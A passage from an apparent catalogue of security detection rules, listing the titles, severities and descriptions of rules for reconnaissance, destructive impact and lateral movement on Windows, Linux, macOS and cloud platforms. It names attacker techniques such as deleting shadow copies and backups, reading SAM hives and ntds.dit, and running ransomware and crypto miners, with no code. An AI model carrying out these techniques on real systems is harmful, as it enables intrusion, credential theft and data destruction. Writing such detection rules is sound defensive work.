AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - ProcCreationmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Computer Discovery And Export Via Get-ADComputer CmdletmediumDetects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
Suspicious Reconnaissance Activity Using Get-LocalGroupMember CmdletmediumDetects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
Malicious PowerShell Commandlets - ProcessCreationhighDetects Commandlet names from well-known PowerShell exploitation frameworks
User Discovery And Export Via Get-ADUser CmdletmediumDetects usage of the Get-ADUser cmdlet to collect user information and output it to a file
PUA - AdFind Suspicious ExecutionhighDetects AdFind execution with common flags seen used during attacks
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXEhighDetects active directory enumeration activity using known AdFind CLI flags
PUA - Advanced IP Scanner ExecutionmediumDetects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
PUA - Advanced Port Scanner ExecutionmediumDetects the use of Advanced Port Scanner.
PUA - Crassus ExecutionhighDetects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
PUA - SoftPerfect Netscan ExecutionmediumDetects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
PUA - Nmap/Zenmap ExecutionmediumDetects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
PUA - Process Hacker ExecutionmediumDetects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - Seatbelt ExecutionhighDetects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
PUA - System Informer ExecutionmediumDetects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
PUA - Adidnsdump ExecutionlowThis tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
Detected Windows Software DiscoverymediumAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
Potential Configuration And Service Reconnaissance Via Reg.EXEmediumDetects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
Suspicious Query of MachineGUIDlowUse of reg to get MachineGuid information
Discovery of a System TimelowIdentifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
Renamed AdFind ExecutionhighDetects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
Renamed Remote Utilities RAT (RURAT) ExecutionmediumDetects execution of renamed Remote Utilities (RURAT) via Product PE header field
Renamed Whoami ExecutioncriticalDetects the execution of whoami that has been renamed to a different name to avoid detection
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Potentially Suspicious EventLog Recon Activity Using Log Query UtilitiesmediumDetects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBShighDetects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
Local Accounts DiscoverylowLocal accounts, System Owner/User discovery using operating systems utilities
Suspicious Network CommandlowAdversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
Suspicious Scan Loop NetworkmediumAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Potential Network Sniffing Activity Using Network ToolsmediumDetects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Obfuscated IP Download ActivitymediumDetects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
Obfuscated IP Via CLImediumDetects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
WhoAmI as ParameterhighDetects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
Permission Check Via Accesschk.EXEmediumDetects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
Suspicious Use of PsLogListmediumDetects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
Sysinternals PsService ExecutionmediumDetects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
Sysinternals PsSuspend ExecutionmediumDetects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Suspicious Execution of SysteminfolowDetects usage of the "systeminfo" command to retrieve information
Use of W32tm as TimerhighWhen configured with suitable command line arguments, w32tm can act as a delay mechanism
Suspicious Where ExecutionlowAdversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Enumerate All Information With Whoami.EXEmediumDetects the execution of "whoami.exe" with the "/all" flag
Whoami Utility ExecutionlowDetects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
Whoami.EXE Execution From Privileged ProcesshighDetects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
Group Membership Reconnaissance Via Whoami.EXEmediumDetects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
Whoami.EXE Execution With Output OptionmediumDetects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
Whoami.EXE Execution AnomalymediumDetects the execution of whoami.exe with suspicious parent processes.
Security Privileges Enumeration Via Whoami.EXEhighDetects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
Computer System Reconnaissance Via Wmic.EXEmediumDetects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Local Groups Reconnaissance Via Wmic.EXElowDetects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Uncommon System Information Discovery Via Wmic.EXEmediumDetects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
System Disk And Volume Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
Turla Group Lateral MovementcriticalDetects automated lateral movement by Turla group
WannaCry Ransomware ActivitycriticalDetects WannaCry ransomware activity
Potential Baby Shark Malware ActivityhighDetects activity that could be related to Baby Shark malware
Potential Dridex ActivitycriticalDetects potential Dridex acitvity via specific process patterns
Operation Wocao ActivityhighDetects activity mentioned in Operation Wocao report
Operation Wocao Activity - SecurityhighDetects activity mentioned in Operation Wocao report
Potential Pikabot Discovery ActivityhighDetects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
Remote Registry Management Using Reg UtilitymediumRemote registry management using REG utility from non-admin workstation
Userdomain Variable EnumerationlowDetects suspicious enumeration of the domain the user is associated with.
Process DiscoverylowDetects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
Local Firewall Rules Enumeration Via NetFirewallRule CmdletlowDetects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
Potential Registry Reconnaissance Via PowerShell ScriptmediumDetects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
CMD Shell Output RedirectlowDetects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
Net.EXE ExecutionlowDetects execution of "Net.EXE".
SC.EXE Query ExecutionlowDetects execution of "sc.exe" to query information about registered services on the system
Suspicious Tasklist Discovery CommandinformationalAdversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
System Information Discovery Via Wmic.EXElowDetects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
Potential Backup Enumeration on AWSmediumDetects potential enumeration activity targeting an AWS instance backups
Account Enumeration on AWSlowDetects enumeration of accounts configuration via api call to list different instances and services within a short period of time.
Potential Network Enumeration on AWSlowDetects network enumeration performed on AWS.
Potential Storage Enumeration on AWSmediumDetects potential enumeration activity targeting AWS storage
Network Scans Count By Destination IPmediumDetects many failed connection attempts to different ports or hosts
Network Scans Count By Destination PortmediumDetects many failed connection attempts to different ports or hosts
Silence.Downloader V3highDetects Silence downloader. These commands are hardcoded into the binary.
Automated Turla Group Lateral MovementmediumDetects automated lateral movement by Turla group
Reconnaissance Activity Using BuiltIn CommandsmediumDetects execution of a set of builtin commands often used in recon stages by different attack groups
Enumeration via the Global CatalogmediumDetects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.
Domain User Enumeration Network Recon 01mediumDomain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.impact 156
Show Rules (156)
Title Level Description
Run from a Zip FilemediumPayloads may be compressed, archived, or encrypted in order to avoid detection
Stop Windows ServicelowDetects a Windows service to be stopped
OpenCanary - NTP Monlist RequesthighDetects instances where an NTP service on an OpenCanary node has had a NTP monlist request.
AWS S3 Bucket Versioning DisablemediumDetects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.
AWS EC2 Disable EBS EncryptionmediumIdentifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
AWS EFS Fileshare Modified or DeletedmediumDetects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
AWS EFS Fileshare Mount Modified or DeletedmediumDetects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
AWS EKS Cluster Created or DeletedlowIdentifies when an EKS cluster is created or deleted.
AWS ElastiCache Security Group Modified or DeletedlowIdentifies when an ElastiCache security group has been modified or deleted.
Azure Application DeletedmediumIdentifies when a application is deleted in Azure.
Azure Application Gateway Modified or DeletedmediumIdentifies when a application gateway is modified or deleted.
Azure Application Security Group Modified or DeletedmediumIdentifies when a application security group is modified or deleted.
Azure Application Credential ModifiedmediumIdentifies when a application credential is modified.
Azure Container Registry Created or DeletedlowDetects when a Container Registry is created or deleted.
Azure Device No Longer Managed or CompliantmediumIdentifies when a device in azure is no longer managed or compliant
Azure Device or Configuration Modified or DeletedmediumIdentifies when a device or device configuration in azure is modified or deleted.
Azure DNS Zone Modified or DeletedmediumIdentifies when DNS zone is modified or deleted.
Azure Firewall Modified or DeletedmediumIdentifies when a firewall is created, modified, or deleted.
Azure Firewall Rule Collection Modified or DeletedmediumIdentifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.
Azure Keyvault Key Modified or DeletedmediumIdentifies when a Keyvault Key is modified or deleted in Azure.
Azure Key Vault Modified or DeletedmediumIdentifies when a key vault is modified or deleted.
Azure Keyvault Secrets Modified or DeletedmediumIdentifies when secrets are modified or deleted in Azure.
Azure Kubernetes Cluster Created or DeletedlowDetects when a Azure Kubernetes Cluster is created or deleted.
Azure Kubernetes Network Policy ChangemediumIdentifies when a Azure Kubernetes network policy is modified or deleted.
Azure Kubernetes Pods DeletedmediumIdentifies the deletion of Azure Kubernetes Pods.
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and DeletedmediumDetects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.
Azure Kubernetes Sensitive Role AccessmediumIdentifies when ClusterRoles/Roles are being modified or deleted.
Azure Kubernetes Secret or Config Object AccessmediumIdentifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.
Azure Kubernetes Service Account Modified or DeletedmediumIdentifies when a service account is modified or deleted.
Azure Network Firewall Policy Modified or DeletedmediumIdentifies when a Firewall Policy is Modified or Deleted.
Azure Point-to-site VPN Modified or DeletedmediumIdentifies when a Point-to-site VPN is Modified or Deleted.
Azure Firewall Rule Configuration Modified or DeletedmediumIdentifies when a Firewall Rule Configuration is Modified or Deleted.
Azure Network Security Configuration Modified or DeletedmediumIdentifies when a network security configuration is modified or deleted.
Azure Virtual Network Device Modified or DeletedmediumIdentifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.
Azure Suppression Rule CreatedmediumIdentifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.
Azure Virtual Network Modified or DeletedmediumIdentifies when a Virtual Network is modified or deleted in Azure.
Azure VPN Connection Modified or DeletedmediumIdentifies when a VPN connection is modified or deleted.
Google Cloud Storage Buckets Modified or DeletedmediumDetects when storage bucket is modified or deleted in Google Cloud.
Google Cloud Re-identifies Sensitive InformationmediumIdentifies when sensitive information is re-identified in google Cloud.
Google Cloud DNS Zone Modified or DeletedmediumIdentifies when a DNS Zone is modified or deleted in Google Cloud.
Google Cloud Service Account Disabled or DeletedmediumIdentifies when a service account is disabled or deleted in Google Cloud.
Google Cloud Service Account ModifiedmediumIdentifies when a service account is modified in Google Cloud.
Google Cloud SQL Database Modified or DeletedmediumDetect when a Cloud SQL DB has been modified or deleted.
Google Cloud VPN Tunnel Modified or DeletedmediumIdentifies when a VPN Tunnel Modified or Deleted in Google Cloud.
Google Workspace Application RemovedmediumDetects when an an application is removed from Google Workspace.
Google Workspace MFA DisabledmediumDetects when multi-factor authentication (MFA) is disabled.
Google Workspace Role Modified or DeletedmediumDetects when an a role is modified or deleted in Google Workspace.
Google Workspace Role Privilege DeletedmediumDetects when an a role privilege is deleted in Google Workspace.
Github Delete Action InvokedmediumDetects delete action in the Github audit logs for codespaces, environment, project and repo.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Activity Performed by Terminated UsermediumDetects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
Microsoft 365 - Potential Ransomware ActivitymediumDetects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.
Microsoft 365 - Unusual Volume of File DeletionmediumDetects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.
Okta API Token RevokedmediumDetects when a API Token is revoked.
Okta Application Modified or DeletedmediumDetects when an application is modified or deleted.
Okta Application Sign-On Policy Modified or DeletedmediumDetects when an application Sign-on Policy is modified or deleted.
Okta Network Zone Deactivated or DeletedmediumDetects when an Network Zone is Deactivated or Deleted.
Okta Policy Rule Modified or DeletedmediumDetects when an Policy Rule is Modified or Deleted.
Okta Policy Modified or DeletedlowDetects when an Okta policy is modified or deleted.
Okta Unauthorized Access to AppmediumDetects when unauthorized access to app occurs.
Okta User Account Locked OutmediumDetects when an user account is locked out.
OneLogin User Assumed Another UserlowDetects when an user assumed another user account.
OneLogin User Account LockedlowDetects when an user account is locked or suspended.
Overwriting the File with Dev Zero or NulllowDetects overwriting (effectively wiping/deleting) of a file.
System Shutdown/Reboot - LinuxinformationalAdversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
Commands to Clear or Remove the Syslog - BuiltinhighDetects specific commands commonly used to remove or empty the syslog
Suspicious Log EntriesmediumDetects suspicious log entries in Linux log files
Linux Crypto Mining Pool ConnectionshighDetects process connections to a Monero crypto mining pool
Linux Crypto Mining IndicatorshighDetects command line parameters or strings often used by crypto miners
DD File OverwritelowDetects potential overwriting and deletion of a file using DD.
Group Has Been Deleted Via GroupdelmediumDetects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
History File DeletionhighDetects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Potential Suspicious Change To Sensitive/Critical FilesmediumDetects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
User Has Been Deleted Via UserdelmediumDetects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
Suspicious MacOS Firmware ActivitymediumDetects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
System Shutdown/Reboot - MacOsinformationalAdversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
Time Machine Backup Deletion Attempt Via Tmutil - MacOSmediumDetects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
Time Machine Backup Disabled Via Tmutil - MacOSmediumDetects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.
New File Exclusion Added To Time Machine Via Tmutil - MacOSmediumDetects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
Cisco Denial of ServicemediumDetect a system being shutdown or put into different boot mode
Cisco File DeletionmediumSee what files are being deleted from flash file systems
Cisco Modify ConfigurationmediumModifications to a config that will serve an adversary's impacts or persistence
Monero Crypto Coin Mining Pool LookuphighDetects suspicious DNS queries to Monero mining pools
DNS Events Related To Mining PoolslowIdentifies clients that may be performing DNS lookups associated with common currency mining pools.
Apache Segmentation FaulthighDetects a segmentation fault error message caused by a crashing apache worker process
Nginx Core DumphighDetects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
Application UninstalledlowAn application has been removed. Check if it is critical.
Potential Secure Deletion with SDeletemediumDetects files that have extensions commonly seen while SDelete is used to wipe files.
User Logoff EventinformationalDetects a user log-off activity. Could be used for example to correlate information during forensic investigations
Locked WorkstationinformationalDetects locked workstation session events that occur automatically after a standard period of inactivity.
Windows Update ErrorinformationalDetects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
NTFS Vulnerability ExploitationhighThis the exploitation of a NTFS vulnerability as reported without many details via Twitter
Important Scheduled Task DeletedhighDetects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
Backup Files DeletedmediumDetects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
Suspicious Creation TXT File in User DesktophighRansomware create txt file in the user Desktop
Suspicious Appended ExtensionmediumDetects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
Load Of RstrtMgr.DLL By A Suspicious ProcesshighDetects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Load Of RstrtMgr.DLL By An Uncommon ProcesslowDetects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Suspicious Volume Shadow Copy Vssapi.dll LoadhighDetects the image load of VSS DLL by uncommon executables
Potentially Suspicious Volume Shadow Copy Vsstrace.dll LoadmediumDetects the image load of VSS DLL by uncommon executables
Suspicious Volume Shadow Copy VSS_PS.dll LoadhighDetects the image load of vss_ps.dll by uncommon executables
Network Communication With Crypto Mining PoolhighDetects initiated network connections to crypto mining pools
Delete Volume Shadow Copies Via WMI With PowerShellhighShadow Copies deletion using operating systems utilities via PowerShell
Potential Active Directory Enumeration Using AD Module - PsModulemediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - PsScriptmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Powershell Add Name Resolution Policy Table RulehighDetects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
Silence.EDA DetectioncriticalDetects Silence EmpireDNSAgent as described in the Group-IP report
Remove Account From Domain Admin GroupmediumAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Replace Desktop Wallpaper by PowershelllowAn adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper
Delete Volume Shadow Copies via WMI with PowerShell - PS ScripthighDeletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Deletion of Volume Shadow Copies via WMI with PowerShell - PS ScripthighDetects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Boot Configuration Tampering Via Bcdedit.EXEhighDetects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
Deleted Data Overwritten Via Cipher.EXEmediumDetects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
Copy From VolumeShadowCopy Via Cmd.EXEhighDetects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
Fsutil Suspicious InvocationhighDetects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).
Portable Gpg.EXE ExecutionmediumDetects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
Stop Windows Service Via Net.EXElowDetects the stopping of a Windows service via the "net" utility.
AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - ProcCreationmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Deletion of Volume Shadow Copies via WMI with PowerShellhighDetects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Stop Windows Service Via PowerShell Stop-ServicelowDetects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
Suspicious Reg Add BitLockerhighDetects suspicious addition to BitLocker related registry keys via the reg.exe utility
Potentially Suspicious Desktop Background Change Using Reg.EXEmediumDetects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Renamed Gpg.EXE ExecutionhighDetects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
Renamed Sysinternals Sdelete ExecutionhighDetects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
Delete Important Scheduled TaskhighDetects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
Delete All Scheduled TaskshighDetects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
Disable Important Scheduled TaskhighDetects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
Stop Windows Service Via Sc.EXElowDetects the stopping of a Windows service via the "sc.exe" utility
Suspicious Execution of ShutdownmediumUse of the commandline to shutdown or reboot windows
Suspicious Execution of Shutdown to Log OutmediumDetects the rare use of the command line tool shutdown to logoff a user
Potential Crypto Mining ActivityhighDetects command line parameters or strings often used by crypto miners
Sensitive File Access Via Volume Shadow Copy BackuphighDetects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
Shadow Copies Deletion Using Operating Systems UtilitieshighShadow Copies deletion using operating systems utilities
Potential File Overwrite Via Sysinternals SDeletehighDetects the use of SDelete to erase a file not the free space
All Backups Deleted Via Wbadmin.EXEhighDetects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
Windows Backup Deleted Via Wbadmin.EXEmediumDetects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
File Recovery From Backup Via Wbadmin.EXEmediumDetects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
Potentially Suspicious Desktop Background Change Via RegistrymediumDetects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Registry Disable System RestorehighDetects the modification of the registry to disable a system restore on the computer
New Root or CA or AuthRoot Certificate to StoremediumDetects the addition of new root, CA or AuthRoot certificates to the Windows registry
Potential Ransomware Activity Using LegalNotice MessagehighDetect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
WannaCry Ransomware ActivitycriticalDetects WannaCry ransomware activity
Potential Dtrack RAT ActivitycriticalDetects potential Dtrack RAT activity via specific process patterns
LockerGoga Ransomware ActivitycriticalDetects LockerGoga ransomware activity via specific command line.
Potential Maze Ransomware ActivitycriticalDetects specific process characteristics of Maze ransomware word document droppers
Potential BlackByte Ransomware ActivityhighDetects command line patterns used by BlackByte ransomware in different operations
Potential Conti Ransomware ActivitycriticalDetects a specific command used by the Conti ransomware group
BlueSky Ransomware ArtefactshighDetect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
CVE-2024-49113 Exploitation Attempt - LDAP NightmarehighDetects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
Amsi.DLL Load By Uncommon ProcesslowDetects loading of Amsi.dll by uncommon processes
Process Terminated Via TaskkilllowDetects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
Multiple Modsecurity BlocksmediumDetects multiple blocks by the mod_security module (Web Application Firewall)
Suspicious Multiple File Rename Or Delete OccurredmediumDetects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).
attack.lateral_movement 151
Show Rules (151)
Title Level Description
Suspicious Epmap ConnectionhighDetects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)
PsExec Pipes ArtifactsmediumDetecting use PsExec via Pipe Creation/Access to pipes
DCOM InternetExplorer.Application Iertutil DLL Hijack - SysmoncriticalDetects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
Lateral Movement Indicator ConDrvlowThis event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
OpenCanary - SMB File Open RequesthighDetects instances where an SMB service on an OpenCanary node has had a file open request.
OpenCanary - SNMP OID RequesthighDetects instances where an SNMP service on an OpenCanary node has had an OID request.
OpenCanary - SSH Login AttempthighDetects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection AttempthighDetects instances where an SSH service on an OpenCanary node has had a connection attempt.
OpenCanary - VNC Connection AttempthighDetects instances where a VNC service on an OpenCanary node has had a connection attempt.
Remote Schedule Task Lateral Movement via ATSvchighDetects remote RPC calls to create or execute a scheduled task via ATSvc
Remote Encrypting File System AbusehighDetects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
Remote Schedule Task Lateral Movement via ITaskSchedulerServicehighDetects remote RPC calls to create or execute a scheduled task
Remote Printing Abuse for Lateral MovementhighDetects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR
